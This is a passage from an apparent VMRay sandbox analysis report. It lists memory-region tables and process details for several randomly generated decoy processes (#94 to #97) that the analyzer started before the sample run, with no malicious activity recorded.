- |
| pagefile_0x0000000001060000 | 0x01060000 | 0x01063fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001070000 | 0x01070000 | 0x0107ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011c0000 | 0x011c0000 | 0x011fffff | Private Memory | rw |
|
|
|
- |
| song_biz_boats.exe | 0x01230000 | 0x01246fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001250000 | 0x01250000 | 0x01307fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x0145ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001460000 | 0x01460000 | 0x015e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000015f0000 | 0x015f0000 | 0x01770fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000017e0000 | 0x017e0000 | 0x017effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000017f0000 | 0x017f0000 | 0x02beffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002de0000 | 0x02de0000 | 0x02deffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ebd0000 | 0x7ebd0000 | 0x7eccffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ecd0000 | 0x7ecd0000 | 0x7ecf2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ecf3000 | 0x7ecf3000 | 0x7ecf3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecf6000 | 0x7ecf6000 | 0x7ecf6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecf7000 | 0x7ecf7000 | 0x7ecf9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecfd000 | 0x7ecfd000 | 0x7ecfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #94: tramadol_operates_statute.exe
0
0
| Information | Value |
|---|---|
| ID | #94 |
| File Name | c:\program files\microsoft office\tramadol_operates_statute.exe |
| Command Line | "C:\Program Files\Microsoft Office\tramadol_operates_statute.exe" |
| Initial Working Directory | C:\Program Files\Microsoft Office\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb50 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C68
0x
828
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000200000 | 0x00200000 | 0x0020ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00213fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00243fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00393fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x003c0000 | 0x0047dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00aaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x00b67fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00c6ffff | Private Memory | rw |
|
|
|
- |
| tramadol_operates_statute.exe | 0x013c0000 | 0x013d6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000013e0000 | 0x013e0000 | 0x027dffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e440000 | 0x7e440000 | 0x7e53ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e540000 | 0x7e540000 | 0x7e562fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e564000 | 0x7e564000 | 0x7e564fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e566000 | 0x7e566000 | 0x7e568fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e56c000 | 0x7e56c000 | 0x7e56efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e56f000 | 0x7e56f000 | 0x7e56ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #95: batteries dirty.exe
0
0
| Information | Value |
|---|---|
| ID | #95 |
| File Name | c:\program files\reference assemblies\batteries dirty.exe |
| Command Line | "C:\Program Files\Reference Assemblies\batteries dirty.exe" |
| Initial Working Directory | C:\Program Files\Reference Assemblies\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xae0 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C64
0x
7A8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00a23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a30fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x00a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a60000 | 0x00a60000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x00bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bc0000 | 0x00bc0000 | 0x00bc1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00bd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000be0000 | 0x00be0000 | 0x00be3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c00000 | 0x00c00000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00c10000 | 0x00ccdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f10000 | 0x00f10000 | 0x01097fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010e0000 | 0x010e0000 | 0x010effff | Private Memory | rw |
|
|
|
- |
| batteries dirty.exe | 0x01130000 | 0x01146fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x01207fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001220000 | 0x01220000 | 0x013a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000013b0000 | 0x013b0000 | 0x027affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027b0000 | 0x027b0000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3e0000 | 0x7f3e0000 | 0x7f4dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4e0000 | 0x7f4e0000 | 0x7f502fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f503000 | 0x7f503000 | 0x7f505fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f509000 | 0x7f509000 | 0x7f509fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50c000 | 0x7f50c000 | 0x7f50efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50f000 | 0x7f50f000 | 0x7f50ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #96: mad.exe
0
0
| Information | Value |
|---|---|
| ID | #96 |
| File Name | c:\program files (x86)\windows sidebar\mad.exe |
| Command Line | "C:\Program Files (x86)\Windows Sidebar\mad.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Sidebar\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb14 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C60
0x
B68
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| mad.exe | 0x00260000 | 0x00276fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x00efffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x00f1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f20000 | 0x00f20000 | 0x00f33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x0107ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001080000 | 0x01080000 | 0x01083fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001090000 | 0x01090000 | 0x01090fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x010a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010b0000 | 0x010b0000 | 0x010b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010c0000 | 0x010c0000 | 0x010c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010d0000 | 0x010d0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x010e0000 | 0x0119dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000011e0000 | 0x011e0000 | 0x01297fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012a0000 | 0x012a0000 | 0x012a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000012b0000 | 0x012b0000 | 0x013affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000014b0000 | 0x014b0000 | 0x01637fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001640000 | 0x01640000 | 0x017c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000017d0000 | 0x017d0000 | 0x02bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02dbffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ecad000 | 0x7ecad000 | 0x7ecaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007ecb0000 | 0x7ecb0000 | 0x7edaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edb0000 | 0x7edb0000 | 0x7edd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007edd4000 | 0x7edd4000 | 0x7edd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edd7000 | 0x7edd7000 | 0x7edd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eddd000 | 0x7eddd000 | 0x7eddffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #97: downloadedrack.exe
0
0
| Information | Value |
|---|---|
| ID | #97 |
| File Name | c:\program files (x86)\msbuild\downloadedrack.exe |
| Command Line | "C:\Program Files (x86)\MSBuild\downloadedrack.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSBuild\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6b4 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C5C
0x
658
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x00a6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00a73fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00a80fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x00aa3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00beffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000bf0000 | 0x00bf0000 | 0x00bf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x00c00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00c11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c60000 | 0x00c60000 | 0x00c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00c70fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00d7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d80000 | 0x00e3dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000f40000 | 0x00f40000 | 0x010c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000010d0000 | 0x010d0000 | 0x010d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000010e0000 | 0x010e0000 | 0x010effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010f0000 | 0x010f0000 | 0x0112ffff | Private Memory | rw |
|
|
|
- |
| downloadedrack.exe | 0x011a0000 | 0x011b6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000011c0000 | 0x011c0000 | 0x01340fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001350000 | 0x01350000 | 0x0274ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002750000 | 0x02750000 | 0x02807fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0290ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0291ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ef4d000 | 0x7ef4d000 | 0x7ef4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007ef50000 | 0x7ef50000 | 0x7f04ffff | Pagefile Backed Memory | r |
|
|
|
